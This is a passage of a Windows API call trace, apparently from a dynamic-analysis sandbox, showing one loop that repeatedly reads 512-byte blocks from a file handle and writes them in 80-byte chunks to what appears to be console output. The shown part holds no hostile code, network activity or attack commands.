GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.875] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.875] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.876] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.876] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] GetFileType (hFile=0x50) returned 0x1 [0136.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.876] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.877] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.877] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] GetFileType (hFile=0x50) returned 0x1 [0136.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.877] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.878] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.878] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] GetFileType (hFile=0x50) returned 0x1 [0136.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.878] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.879] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.879] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.880] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.880] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.881] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.881] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.882] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.882] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, 